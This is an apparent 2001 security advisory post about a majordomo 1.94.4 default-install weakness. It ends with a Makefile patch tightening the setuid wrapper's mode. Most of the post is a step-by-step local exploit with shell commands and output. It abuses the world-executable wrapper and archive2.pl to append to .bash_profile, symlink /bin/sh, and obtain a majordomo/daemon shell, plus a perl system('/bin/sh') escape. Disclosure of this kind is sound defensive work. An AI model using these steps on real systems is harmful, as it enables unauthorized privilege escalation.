Hi, I found something to discuss, this time involving majordomo. This was tested on a Slackware linux 8.0 (kernel 2.4.8); majordomo version 1.94.4, I also tested the other versions and all _default_ installs had the same problem, note that the versions 1.94.1 an 1.94.2 should NOT be used anymore, those are way more simple to exploit. We all know that if you install majordomo you should CAREFULLY read the INSTALL file, simply because else you will have a security problem. Only I doubt that everyone actually follows the guidelines. Besides that, I feel that Majordomodevelopers _could_ make a more secure default install without affecting the functionality of the program. A simple patch would _at least_ stop the possiblities which are descibed below. Also I did not find in the documents that majordomo should have a shell (so give it a nologin or whatever, it works fine without shell). An example: Who am i marco@anubis:~$ id -a uid=1001(marco) gid=100(users) groups=100(users) This could happen if you give it a /home/majordomo marco@anubis:~$ ls -al /home/|grep majordomo drwxr-x--x 6 majordom daemon 4096 Sep 13 23:50 majordomo/ Suidbit + executable for everyone (this is where the patch comes in) marco@anubis:~$ ls -al ~majordomo/wrapper -rwsr-xr-x 1 root daemon 16451 Aug 31 13:51 /home/majordomo/wrapper* This is the program I'm going to abuse marco@anubis:~$ ls -al ~majordomo/archive2.pl -rwxr-xr-x 1 majordom daemon 5234 Aug 31 13:51 /home/majordomo/archive2.pl* Make a template marco@anubis:~$ echo "ln -s /bin/sh ~/majordomo/sh 2>/dev/null">test Append majordomo's .bash_profile (or .profile etc..) with your template using buggy archive2.pl (yes, not wrapper is buggy here, archive2.pl is, that one can use /'s, I need wrapper for becoming user majordomo though). marco@anubis:~$ ~majordomo/wrapper archive2.pl -f .bash_profile -a ~marco/test Now hit the .bash_profile (sometimes the majordomo admin might need it and do the same). marco@anubis:~$ su - majordomo Password: majordomo@anubis:~$ id -a uid=666(majordomo) gid=2(daemon) groups=2(daemon) majordomo@anubis:~$ exit See if it worked marco@anubis:~$ ls -al ~majordomo/sh lrwxrwxrwx 1 majordom daemon 7 Sep 13 23:57 /home/majordomo/sh -> /bin/sh* Jupz it worked, now someone could abuse it, let's do that. marco@anubis:~$ ~majordomo/wrapper sh sh-2.05$ id -a uid=666(majordomo) gid=2(daemon) groups=100(users) sh-2.05$ Ok, I'm majordomo. Also, in the README file is described how one could debug majordomo. Finally, if you're up to mucking around in the perl code, symlinking perl into ~majordomo and invoking it via wrapper will give you a debug environment with Majordomo's permissions and view of the world: ~majordomo% ./wrapper perl -d majordomo Well, same problem :) Dont forget to remove the symlink or else everyone can do this: marco@anubis:~$ /home/majordomo/wrapper perl system("/bin/sh"); ^D sh-2.04$ One could append the perlfiles to make them execute your evil code of course since the archive2 program appends. This could give a majordomo uid/daemon gid shell. The main point here is that we can write to majordomo owned files to simply alter data in the lists or score a shell (and obtaining a daemon gid). reading the INSTALL file carefully will help you to prevent this, but I prefer to apply a patch before starting the installation to make sure that the wrapper is not executable for everyone (it _should_ have 4750 and not 4755). --- simple patch to make default install more secure --- --- Makefile.orig Fri Sep 14 09:43:45 2001 +++ Makefile Fri Sep 14 09:44:20 2001 @@ -42,7 +42,7 @@ # change these values! WRAPPER_OWNER = root WRAPPER_GROUP = $(W_GROUP) -WRAPPER_MODE = 4755 +WRAPPER_MODE = 4750 POSIX = -DPOSIX_UID=$(W_USER) -DPOSIX_GID=$(W_GROUP) # Otherwise, if your system is NOT POSIX (e.g. SunOS 4.x, SGI Irix 4, # HP DomainOS) then comment out the above four lines and uncomment just my 2 cents, grtz, Marco van Berkum -- GCC dpu s:--- a- C+++ US++++ P++ L+++ E---- W N o-- K w--- O- M-- V-- PS+++ PE-- Y+ PGP--- t--- 5 X R* tv++ b+++ DI-- D---- G++ e- h+ r y* +---------------------+------------------+-------------------+ | Marco van Berkum | MB17300-RIPE | Security Engineer | | http://ws.obit.nl | "Chernobyl used | Network Admin | | m.v.berkum@obit.nl | Windows" | UNIX | +---------------------+------------------+-------------------+